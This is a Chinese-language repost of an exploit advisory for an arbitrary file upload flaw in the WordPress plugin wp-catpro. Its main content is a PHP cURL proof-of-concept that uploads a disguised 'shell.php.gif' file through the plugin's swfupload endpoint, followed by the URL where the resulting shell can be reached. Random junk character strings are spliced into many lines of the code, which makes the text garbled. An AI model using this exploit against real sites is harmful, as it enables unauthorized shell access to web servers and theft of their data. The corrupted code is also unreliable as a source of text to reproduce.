WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
; T* f4 W  g' w2 N6 y4 F! q邮箱 => zikou16x@gmail.com
5 W9 o1 b5 `6 @  j; w/ E8 z测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
; n/ p  [. g: f4 Y) S6 J0 y####
: ?" O" t+ O- p* L
$ V6 [# i( C( `/ v5 I#=> Exploit 信息:
" [" X3 t: ~/ o5 A3 C$ R------------------
; u/ }# k$ H: U' l3 i# L1 \# 攻击者可以上传 file/shell.php.gif
0 H" Q! O1 T' |9 h# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
' s7 c. |( j* T) m- o# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
9 h/ I2 |0 r4 n# [/ D) M6 ?9 W<?php

9 i1 }8 d! t" B* y$uploadfile="zik.php.gif";
8 J& Z/ m1 [6 ~& F% N9 P$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
, ~, I' f4 p# h% qcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
  z" [" W! s" z; B! D8 }1 q- W'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
( |. J# R" H' r  o$ H% j& }$postResult = curl_exec($ch);
curl_close($ch);
6 ~; k! F" f# c/ }
print "$postResult";
$ \0 i3 J% C! d
( Q: u0 m& l% FShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
, y6 Q+ L% [. p$ s$ K: R! H; b<?php
1 W# E& U3 `3 A7 L9 Uphpinfo();
3 |1 m; B: d# c. m4 j6 J% v?>